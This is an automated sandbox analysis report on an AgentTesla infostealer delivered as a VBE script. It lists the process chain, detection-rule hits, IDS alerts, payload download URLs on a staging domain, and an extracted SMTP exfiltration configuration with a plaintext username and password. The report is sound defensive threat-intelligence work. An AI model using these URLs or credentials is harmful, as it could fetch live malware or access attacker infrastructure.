Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Booking_0731520.vbe

Overview

General Information

Sample name:Booking_0731520.vbe
Analysis ID:1554388
MD5:134984e6d7545ba5eb30563498459f72
SHA1:58ebeaa8da58484f3fcc371b436243e49e41d507
SHA256:98b8949bd59e771f6e2cd4366783145ea645fe71d255e92462864551292113a9
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 8012 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8092 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 3276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 1632 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              8.2.RegSvcs.exe.1150000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.RegSvcs.exe.1150000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.RegSvcs.exe.1150000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  SourceRuleDescriptionAuthorStrings
                  amsi64_8092.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xc55f:$e4: Get-WmiObject
                  • 0xc74e:$e4: Get-Process
                  • 0xc7a6:$e4: Start-Process

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", ProcessId: 7252, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.215.48, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49983
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", ProcessId: 7252, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8012, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 8092, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:40:06.552482+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549707TCP
                  2024-11-12T13:40:45.748023+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549920TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:39:48.072675+010020283713Unknown Traffic192.168.2.549704172.67.215.48443TCP
                  2024-11-12T13:39:49.557492+010020283713Unknown Traffic192.168.2.549705172.67.215.48443TCP
                  2024-11-12T13:39:50.915029+010020283713Unknown Traffic192.168.2.549706172.67.215.48443TCP
                  2024-11-12T13:40:04.633177+010020283713Unknown Traffic192.168.2.549709172.67.215.48443TCP
                  2024-11-12T13:40:05.930252+010020283713Unknown Traffic192.168.2.549712172.67.215.48443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:39:42.481624+010020301711A Network Trojan was detected192.168.2.549983162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:41:13.436879+010028555421A Network Trojan was detected192.168.2.549983162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:41:13.436879+010028552451A Network Trojan was detected192.168.2.549983162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-12T13:39:42.481624+010028400321A Network Trojan was detected192.168.2.549983162.254.34.31587TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 8.2.RegSvcs.exe.1150000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                  Source: Booking_0731520.vbeReversingLabs: Detection: 25%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49981 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.215.48 443Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                  Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.215.48:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.215.48:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.215.48:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.215.48:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.215.48:443
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49707
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49920
                  Source: global trafficTCP traffic: 192.168.2.5:49983 -> 162.254.34.31:587
                  Source: global trafficHTTP traffic detected: GET /2910/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /2910/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET /2910/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: documenthost.store
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: documenthost.store
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: wscript.exe, 00000000.00000003.2108425270.000001FE4E4BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txt
                  Source: wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/2910/file
                  Source: wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/2910/filen
                  Source: wscript.exe, 00000000.00000003.2072048956.000001FE4C774000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249173462.000001FE4C7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108425270.000001FE4E4BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/2910/r
                  Source: wscript.exe, 00000000.00000002.2249173462.000001FE4C7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2057998960.000001FE4C745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/2910/s
                  Source: wscript.exe, 00000000.00000003.2221847721.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2072222190.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2058132166.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store/L
                  Source: wscript.exe, 00000000.00000003.2108162722.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108624502.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txt
                  Source: wscript.exe, 00000000.00000003.2247957240.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2246918851.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store:443/2910/file
                  Source: wscript.exe, 00000000.00000003.2072048956.000001FE4C759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://documenthost.store:443/2910/r
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49981 version: TLS 1.2

                  System Summary

                  barindex
                  Source: amsi64_8092.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02EAE2708_2_02EAE270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02EA4A988_2_02EA4A98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02EAAA128_2_02EAAA12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02EA3E808_2_02EA3E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02EA41C88_2_02EA41C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2A1788_2_06B2A178
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B366688_2_06B36668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B356408_2_06B35640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B3B2A38_2_06B3B2A3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B3C2008_2_06B3C200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B331008_2_06B33100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B37DF08_2_06B37DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B377108_2_06B37710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B3E4188_2_06B3E418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B324098_2_06B32409
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B300408_2_06B30040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B35D5F8_2_06B35D5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B3001A8_2_06B3001A
                  Source: amsi64_8092.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
